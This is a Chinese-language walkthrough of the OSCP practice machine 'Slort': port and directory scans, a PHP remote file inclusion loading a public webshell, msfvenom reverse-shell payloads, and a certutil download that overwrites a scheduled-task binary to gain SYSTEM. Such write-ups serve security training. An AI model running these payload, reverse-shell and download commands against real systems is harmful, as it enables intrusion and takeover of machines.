OSCP靶场--Slort

OSCP靶场–Slort

考点(1.php 远程文件包含 2.定时任务提权)

1.nmap扫描

                                                                                                                 
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.178.53 -sV -sC -p-  --min-rate 5000 
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-24 04:37 EST
Nmap scan report for 192.168.178.53
Host is up (0.28s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC                                                              
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                      
445/tcp   open  microsoft-ds?                                                                                    
3306/tcp  open  mysql?                                                                                           
| fingerprint-strings:                                                                                           
|   DNSVersionBindReqTCP, JavaRMI, LPDString, NULL:                                                              
|_    Host '192.168.45.179' is not allowed to connect to this MariaDB server                                     
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)                             
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6                                             
| http-title: Welcome to XAMPP                                                                                   
|_Requested resource was http://192.168.178.53:4443/dashboard/                                                   
5040/tcp  open  unknown                                                                                          
7680/tcp  open  pando-pub?                                                                                       
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)                             
|_http-open-proxy: Proxy might be redirecting requests                                                           
| http-title: Welcome to XAMPP                                                                                   
|_Requested resource was http://192.168.178.53:8080/dashboard/                                                   
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6                                             
49664/tcp open  msrpc         Microsoft Windows RPC                                                              
49665/tcp open  msrpc         Microsoft Windows RPC                                                              
49666/tcp open  msrpc         Microsoft Windows RPC                                                              
49667/tcp open  msrpc         Microsoft Windows RPC                                                              
49668/tcp open  msrpc         Microsoft Windows RPC                                                                              
49669/tcp open  msrpc         Microsoft Windows RPC                                                                              
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :                                                                                      
SF-Port3306-TCP:V=7.92%I=7%D=2/24%Time=65D9B8F4%P=x86_64-pc-linux-gnu%r(NU                                                       
SF:LL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20not\x20al                                                       
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersio
SF:nBindReqTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(
SF:LPDString,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20no
SF:t\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Ja
SF:vaRMI,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-24T09:40:46
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.85 seconds

2.user priv

2.1 目录扫描

┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.178.53:8080/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.178.53-8080/-_24-02-24_05-44-47.txt

Error Log: /root/.dirsearch/logs/errors-24-02-24_05-44-47.log

Target: http://192.168.178.53:8080/

[05:44:48] Starting: 
[05:44:51] 403 -    1KB - /%C0%AE%C0%AE%C0%AF                              
[05:44:51] 403 -    1KB - /%3f/
[05:44:52] 403 -    1KB - /%ff                                             
[05:44:59] 403 -    1KB - /.ht_wsr.txt                                     
[05:44:59] 403 -    1KB - /.htaccess.bak1
[05:44:59] 403 -    1KB - /.htaccess.sample
[05:44:59] 403 -    1KB - /.htaccess.save                                  
[05:44:59] 403 -    1KB - /.htaccess.orig
[05:44:59] 403 -    1KB - /.htaccess_extra
[05:44:59] 403 -    1KB - /.htaccess_orig
[05:44:59] 403 -    1KB - /.htaccess_sc
[05:44:59] 403 -    1KB - /.htaccessBAK
[05:44:59] 403 -    1KB - /.htaccessOLD
[05:44:59] 403 -    1KB - /.htaccessOLD2
[05:44:59] 403 -    1KB - /.htm                                            
[05:44:59] 403 -    1KB - /.html                                           
[05:44:59] 403 -    1KB - /.htpasswd_test
[05:44:59] 403 -    1KB - /.htpasswds
[05:44:59] 403 -    1KB - /.httr-oauth
[05:45:17] 403 -    1KB - /Trace.axd::$DATA                                 
[05:45:19] 200 -  782B  - /Webalizer/                                       
[05:45:47] 403 -    1KB - /cgi-bin/                                         
[05:45:47] 500 -    1KB - /cgi-bin/printenv.pl                              
[05:45:52] 301 -  351B  - /dashboard  ->  http://192.168.178.53:8080/dashboard/
[05:45:52] 200 -    6KB - /dashboard/howto.html                             
[05:45:53] 200 -   31KB - /dashboard/faq.html                               
[05:45:53] 200 -   78KB - /dashboard/phpinfo.php                            
[05:45:59] 403 -    1KB - /error/                                           
[05:46:01] 200 -   30KB - /favicon.ico                                      
[05:46:02] 503 -    1KB - /examples                                         
[05:46:02] 503 -    1KB - /examples/                                        
[05:46:02] 503 -    1KB - /examples/servlet/SnoopServlet
[05:46:02] 503 -    1KB - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[05:46:02] 503 -    1KB - /examples/jsp/snp/snoop.jsp
[05:46:02] 503 -    1KB - /examples/servlets/servlet/CookieExample          
[05:46:02] 503 -    1KB - /examples/servlets/index.html
[05:46:02] 503 -    1KB - /examples/servlets/servlet/RequestHeaderExample
[05:46:06] 301 -  345B  - /img  ->  http://192.168.178.53:8080/img/         
[05:46:07] 302 -    0B  - /index.php  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 302 -    0B  - /index.pHp  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 302 -    0B  - /index.php/login/  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 302 -    0B  - /index.php.  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 403 -    1KB - /index.php::$DATA                                 
[05:46:21] 403 -    1KB - /phpmyadmin/ChangeLog                             
[05:46:21] 403 -    1KB - /phpmyadmin/doc/html/index.html
[05:46:21] 403 -    1KB - /phpmyadmin/docs/html/index.html
[05:46:21] 403 -    1KB - /phpmyadmin/README                                
[05:46:22] 403 -    1KB - /phpmyadmin                                       
[05:46:24] 403 -    1KB - /phpmyadmin/                                      
[05:46:24] 403 -    1KB - /phpmyadmin/index.php
[05:46:24] 403 -    1KB - /phpmyadmin/phpmyadmin/index.php                  
[05:46:24] 403 -    1KB - /phpmyadmin/scripts/setup.php
[05:46:31] 403 -    1KB - /server-status/                                   
[05:46:31] 403 -    1KB - /server-status
[05:46:31] 403 -    1KB - /server-info
[05:46:33] 301 -  346B  - /site  ->  http://192.168.178.53:8080/site/       
[05:46:34] 301 -   27B  - /site/  ->  index.php?page=main.php               
[05:46:46] 403 -    1KB - /web.config::$DATA                                
[05:46:46] 403 -    1KB - /webalizer                                        
[05:46:49] 200 -  774B  - /xampp/                                           
                                                                             
Task Completed     

2.2 发现php LFI漏洞:

在这里插入图片描述
包含phpinfo.php文件:
在这里插入图片描述

2.3 发现存在php RFI漏洞:

在这里插入图片描述

2.4 利用RFI获取webshell:

php正向webshell地址:https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php
在这里插入图片描述

2.5 转到交互式shell

##
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o shell443.exe

##
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80

## webshell上传shell443.exe
## 执行shell443.exe

##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443

## local.txt
c:\Users\rupert\Desktop>type local.txt
type local.txt
345738c06042482d447a067226c9bfa7

在这里插入图片描述
在这里插入图片描述
local.txt
在这里插入图片描述

3.root priv

3.1 winpeas.exe:

## 
File: C:\xampp\phpMyAdmin\config.inc.php


在这里插入图片描述

3.2 发现定时任务:

在这里插入图片描述
在这里插入图片描述

3.3 覆盖定时任务二进制文件提权:

##
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o TFTP.EXE 

##
c:\Backup>certutil -urlcache -split -f http://192.168.45.179/TFTP.EXE


##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443            

在这里插入图片描述

4.总结

## 考点:
### 1.远程文件包含
### 2.定时任务提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/408553.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Open CASCADE学习|几何数据结构

在几何引擎内一般把数据分成两类:几何信息与拓扑信息。二者可以完整地表达出实体模型,彼此相互独立、又互相关联。几何信息是指构成几何实体的各几何元素在欧式空间中的位置、大小、尺寸和形状信息。例如一条空间的直线,可以用两端点的位置矢…

【Java程序设计】【C00262】基于Springboot的会员制医疗预约服务管理系统(有论文)

基于Springboot的会员制医疗预约服务管理系统(有论文) 项目简介项目获取开发环境项目技术运行截图 项目简介 这是一个基于Springboot的会员制医疗预约服务管理信息系统,本系统分为三种角色:管理员、医生和会员; 在系统…

在Linux操作系统的ECS实例上安装Hive

目录 1. 完成hadoop安装配置2. 安装配置MySql安装配置 3. 安装Hive4. 配置元数据到MySQL5. hiveserver2服务配置文件测试 1. 完成hadoop安装配置 在Linux操作系统的ECS实例上安装hadoop 以上已安装并配置完jdk、hadoop也搭建了伪分布集群 2. 安装配置MySql 安装 下下一步…

c++之ini配置文件的详细解析

文章目录 ini文件概要代码实例分析小结 ini文件概要 ini文件是一种系统配置文件,它有特定的格式组成。通常做法,我们读取ini文件并按照ini格式进行解析即可。在c语言中,提供了模板类的功能,所以我们可以提供一个更通用的模板类来解…

【机器学习基础】一元线性回归(适合初学者的保姆级文章)

🚀个人主页:为梦而生~ 关注我一起学习吧! 💡专栏:机器学习 欢迎订阅!后面的内容会越来越有意思~ 💡往期推荐: 【机器学习基础】机器学习入门(1) 【机器学习基…

CSS 面试题汇总

CSS 面试题汇总 1. 介绍下 BFC 及其应 参考答案: 参考答案: 所谓 BFC,指的是一个独立的布局环境,BFC 内部的元素布局与外部互不影响。 触发 BFC 的方式有很多,常见的有: 设置浮动overflow 设置为 auto、scr…

【LNMP】云导航项目部署及环境搭建(复杂)

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言一、项目介绍1.1项目环境架构LNMP1.2项目代码说明 二、项目环境搭建2.1 Nginx安装2.2 php安装2.3 nginx配置和php配置2.3.1 修改nginx文件2.3.2 修改vim /etc/p…

精品基于SpringBoot的体育馆场地预约赛事管理系统的设计与实现-选座

《[含文档PPT源码等]精品基于SpringBoot的体育馆管理系统的设计与实现[包运行成功]》该项目含有源码、文档、PPT、配套开发软件、软件安装教程、项目发布教程、包运行成功! 软件开发环境及开发工具: Java——涉及技术: 前端使用技术&#…

【尚硅谷】MybatisPlus 学习笔记(下)

目录 六、插件 6.1、分页插件 6.1.1、添加配置类 6.1.2、测试 6.2、xml自定义分页 6.2.1、UserMapper中定义接口方法 6.2.2、UserMapper.xml中编写SQL 6.2.3、测试 6.3、乐观锁 6.3.1、场景 6.3.2、乐观锁与悲观锁 6.3.3、模拟修改冲突 数据库中增加商品表 添加数…

LeetCode 第一题: 两数之和

文章目录 第一题: 两数之和题目描述示例 解题思路Go语言实现 - 一遍哈希表法C实现算法分析 排序和双指针法Go语言实现 - 排序和双指针法C算法分析 暴力法Go语言实现 - 暴力法C算法分析 二分搜索法Go语言实现 - 二分搜索法C算法分析 第一题: 两数之和 ‍ 题目描述 给定一个整…

规则持久化(Sentinel)

规则持久化 基于Nacos配置中心实现推送 引入依赖 <dependency><groupId>com.alibaba.csp</groupId><artifactId>sentinel-datasource-nacos</artifactId> </dependency> 流控配置文件 [{"resource":"/order/flow",…

vue+nodejs+uniapp婚纱定制婚庆摄影系统 微信小程序 springboot+python

目前移动互联网大行其道&#xff0c;人人都手中拿着智能机&#xff0c;手机手机&#xff0c;手不离机&#xff0c;如果开发一个用在手机上的程序软件&#xff0c;那是多么的符合潮流&#xff0c;符合管理者和客户的理想。本次就是开发婚庆摄影小程序&#xff0c;有管理员&#…

k8s学习笔记-基础概念

&#xff08;作者&#xff1a;陈玓玏&#xff09; deployment特别的地方在于replica和selector&#xff0c;docker根据镜像起容器&#xff0c;pod控制容器&#xff0c;job、cronjob、deployment控制pod&#xff0c;job做离线任务&#xff0c;pod大多一次性的&#xff0c;cronj…

【蓝桥杯】拓扑排序

一.拓扑排序 1.定义&#xff1a; 设G&#xff08;V&#xff0c;E&#xff09;是一个具有n个顶点的有向图&#xff0c;V中的顶点序列称为一个拓扑序列&#xff0c;当且仅当满足下列条件&#xff1a;若从顶点到有一条路径&#xff0c;则在顶点序列中顶点必在之前。 2.基本思想…

Vue+SpringBoot打造音乐偏好度推荐系统

目录 一、摘要1.1 项目介绍1.2 项目录屏 二、系统设计2.1 功能模块设计2.1.1 音乐档案模块2.1.2 我的喜好模块2.1.3 每日推荐模块2.1.4 通知公告模块 2.2 用例图设计2.3 实体类设计2.4 数据库设计 三、系统展示3.1 登录注册3.2 音乐档案模块3.3 音乐每日推荐模块3.4 通知公告模…

【安装】CentOS 7 使用 OUI 图形界面安装 Oracle Database 19.3

需安装使用 X Server 协议的软件&#xff08;如 Xorg&#xff09;和如桌面图形软件&#xff08;Gnome 或 KDE&#xff09;。 使用 root 用户执行&#xff1a; # curl -o oracle-database-preinstall-19c-1.0-1.el7.x86_64.rpm https://yum.oracle.com/repo/OracleLinux/OL7/l…

istio系列教程

istio学习记录——安装https://suxueit.com/article_detail/otVbfI0BWZdDRfKqvP3Gistio学习记录——体验bookinfo及可视化观测https://suxueit.com/article_detail/o9VdfI0BWZdDRfKqlv0r istio学习记录——kiali介绍https://suxueit.com/article_detail/pNVbfY0BWZdDRfKqX_0K …

在Node.js中如何实现用户身份验证和授权

当涉及到构建安全的应用程序时&#xff0c;用户身份验证和授权是至关重要的一环。在Node.js中&#xff0c;我们可以利用一些流行的库和技术来实现这些功能&#xff0c;确保我们的应用程序具有所需的安全性。本篇博客将介绍如何在Node.js中实现用户身份验证和授权。 用户身份验…

“激发无限创意:在线图片制作,点亮你的视觉灵感!“

在数字时代&#xff0c;图片已经成为我们表达创意、分享故事和展示个性的重要方式。然而&#xff0c;你是否曾因为缺乏专业的设计技能或繁琐的制作流程而感到困扰&#xff1f;现在&#xff0c;有了在线图片制作平台&#xff0c;释放你的创意灵感变得前所未有的简单和方便&#…